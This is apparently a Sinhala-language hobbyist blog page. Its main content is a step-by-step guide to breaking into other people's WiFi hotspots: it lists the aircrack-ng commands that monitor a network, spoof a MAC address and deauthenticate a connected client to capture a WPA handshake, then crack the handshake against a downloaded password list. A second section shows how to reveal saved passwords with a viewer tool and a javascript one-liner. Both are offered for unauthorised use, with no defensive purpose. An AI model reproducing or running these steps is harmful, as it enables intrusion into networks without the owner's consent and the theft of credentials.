අනතුරුව ඇන්ඩ්‍රොයිඩ් දුරකථනය සඳහා ඇති ඇප් එකත් බාගත කරගෙන ස්ථාපනය කරගන්න.
පරිගණකයේ හා ඇන්ඩ්‍රොයිඩ් දුරකථනයේ සාර්ථකව අදාළ මෘදුකාංග ස්ථාපනය කළ පසු USB හෝ WiFi මාර්ගයෙන් එකිනෙක සම්බන්ධ කළ හැකියි.

DOWNLOAD FOR WINDOWS

DOWNLOAD FOR ANDROID 


වයිෆයි  (WiFi) ගැන ඔයාලා දන්නවනේ නේද?  WiFi කියන්නෙ වයර් රහිතව කරන සංන්නිවේදන කටයුත්තකට. ( Wireless Fidelity, wireless internet) ඉතින් මේ ආකාරයට  වයර් රහිතව  සංන්නිවේදන කටයුතු කරන්නේ පහසුවට.  වයර්  එක්ක වැඩ කරන්න අපහසු හින්දා. ඉතින් ඒ ආකාරයට වැඩකරන ස්තානයකට අපි කියනවා WiFi Hotspot එකක් කියලා.  WiFi Hotspot එකක වෙබ් අඩවි තහනම් කිරීමක් බාගන්න තියන වේගය අඩාල කිරීමක් වගේ දේවල් සිද්දවෙන්නෙ නේ. ඒ කියන්නෙ  WiFi Hotspot  එකකදී අන්තර්ජාලය පුල් නිදහස් කියන එක.  ඉතින් මේ  WiFi Hotspot  ජාලකරන තලමිතීන් අනුව ආරක්ශිතව හදලයි තියෙන්නේ. ඒ කියන්නෙ මුරපද දාල වගේ.  ඉතින් දැන් කියන්න යන්නේ කොහොමද මේ මුරපද බිදගෙන  WiFi Hotspot  එකක් ඇතුලට යන්නෙ කියලා

මේ වැඩේ කරන්න පහල දේවල් ඕනේ

1. Linux Backtrack 5 RC2 ( ඔයාල භාවිතා කරන පරිගනකයේ ඕස් එකට අදාල වර්ශන් එක බාගන්න)






2 හොදට වැඩ කරන wireless කාඩ් එකක්


3. දැනට බාවිතා වෙන පාස්වර්ඩ් ලිස්ට් එකක්. මේක නම් ගූගල් වලින් හොයාගන්න පුලුවන්. ටිකක් කම්මැලි නම් මෙන්න තියනවා පාස්වර්ඩ් 1717681

ම.


හරි, මන් හිතන්නේ ඔයාලා දැන් Linux Backtrack 5 RC2 බාගෙන සීඩී එකකට ගහගෙන එහෙම ඇති කියලා. ඊලගට පරිගනකය ඒ සීඩී එකෙන් බූට් කරන්න. ලිනක්ස් ගැන ටිකක් දැනගෙන ඉන්න නම් ඕනේ. කමක් නෑ දන්නේ නැත්නම් මං ස්ක්‍රීන් සොට්ස් ටිකක් දාන්නම්.
පලමු පියවර 
මුලින්ම root@bt:~# කියන තැනට airmon-ng කියන විදානය බාවිතා කලාම ඉහල රූපයේ ආකාරයට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා 
මෙතන පෙන්නන wlan0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට හැමදේම කියන්නෙ. ඉතින් ඔයාලා wlan0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම 
දෙවන පියවර 
airmon-ng start wlan0 කියන විදානය ලබා දෙන්න. මේකෙන් අපි බලන්නේ අපිට හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එක ක්‍රියාකාරී තත්වයෙන් තියනවද කියල.

තුන්වන පියවර 

මෙතනදි අපි ifconfig කියන විදානය ලබා දෙනවා. එතනදි අපිට පහල ආකාරයට හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ තොරතුරු බලගන්න පුලුවන්.




හතරවන පියවර 
මෙතනදි කරන්න බලපොරොත්තු වෙන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න. පහල විදානය බාවිතා කරන්න.
macchanger –m 00:11:22:33:44:55 wlan0
පස්වන පියවර 
මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද කියන එක බලන එක. ඒකට පහත විදානය බාවිත කරන්න පුලුවන්. 
airodump-ng mon0
හයවන පියවර 
ඊලගට අපිට බලගන්න පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම. SSID එක. රතුපාටින් දාල තියෙන්නෙ ඒක. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. ඒකට පහල විදානය දෙන්න. 
airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE
 කොල පාටින් තියෙන්නෙ ඒ වගෙ ලොග් වෙලා ඉන්න කෙනෙක්ගේ මැක් එකක්. 
හත්වන පියවර 
ඊලගට කරන්න ඕනේ දැනට ලොග්වෙල ඉන්න කෙනා එක්ක පොඩි handshake දාගන්න  ඒකට පහල විදානය දෙන්න. 
aireplay-ng –0 –4 –a MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0
මේ විදානය දුන්නට පස්සෙ ඉහල රූපයේ පෙනෙන ආකරයට විදානයන් ක්‍රියත්මක වෙයි.
අටවන පියවර 
ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න  WiFi නෙට්වර්ක් එකේ  පාස්කී එක ලබා ගන්න.  ඒකට පහල විදානය දෙන්න. 
aircrack-ng crackwpa-01.cap –w list

මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත්  එක දෙන්න ඕනේ. 
ඉතින් ඔන්න කොල පාටින් දක්වලා තියන ආකාරයට අපිට හැක් කරන්න ඕනේ  WiFi නෙට්වර්ක් එකේ  පාස්කී එක පෙන්නනවා. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න








අද කියල දෙන්න යන්නේ Web Browser එකක හෝ Messenger Software එකක save password හොයාගන්නේ කොහොමද කියලා.
එක කරන්න පොඩි Tool එකක් හා JavaScript එකක් තියෙනවා.
Password Viewer v1.4



මේක අලුත් Web Browser වලට නම් වැඩ කරනවා අඩුයි. ඒත් Google Talk වගේ Messenger Software වලට හොදට වැඩ කරනවා. කරන්න තියෙන්නේ ඔය අත drag කරගෙන ගිහිල්ලා එක aim බලන්න වගේ තියෙන තැන Password Field එක උඩින් තියෙන එකයි.
අනිත් එක තමයි JavaScript  එක. Password එක බලන්න ඕන Web-site එකට ගිහිල්ලා Addressbar  එකට මේ JavaScript එක Type කරල enter කරන්න. එච්චරයි.
javascript: alert(document.getElementById(‘Passwd’).value);
Download this script 

මේ JavaScript එක Google Chrome අලුත්ම version එකට උනත් වැඩ. ඒත් Firefox වලට නම් වැඩ කරන්නේ නැ.
මම මෙතන දාපු tool එක Password Viewer v1.4 විතරක්ම නෙමෙයි  password බලන්න තියෙන්නේ. Google එකට ගිහිල්ල password viewer කියල search කරානම් අලුත් අලුත් ඒවා ton ගනනින් තව හොයාගන්න පුලුවන්.
Welcome To My Blog

අපගේ ලිපි ඔබගේ Phone එකට නොමිලේ ගෙන්වාගැනීමට

අපේ Blog Post ඔයාගේ ෆෝන් එකටම ගෙන්න ගන්න ... " Follow RBMR1 " කියල Type කරලා 40404 දැන්ම SMS එකක් යවන්න ...

කොහොමද අපේ බ්ලොග් එක

Creative Commons License
මෙහි පලවෙන කිසිම කරුණක් කිසිම ආකාරයකින් උපුටා ගැනීම තහනම් වේ ! RBMR Blog is licensed under a Creative Commons Attribution-NoDerivatives 4.0 International License.
Permissions beyond the scope of this license may be available at http://ourrbmr.blogspot.com/.

R.B.M.R Donate

ගොඩක් අය බලපුවා

OUR MOVIE ZONE

ONLINE

Time

R.B.M.R (හැම දෙයක්ම). Powered by Blogger.

About Me

Blog Archive

Chat එකක් දාමුද

- Copyright © R.B.M.R (හැම දෙයක්ම) -RBMR- Powered by Blogger - Designed by Buddhike -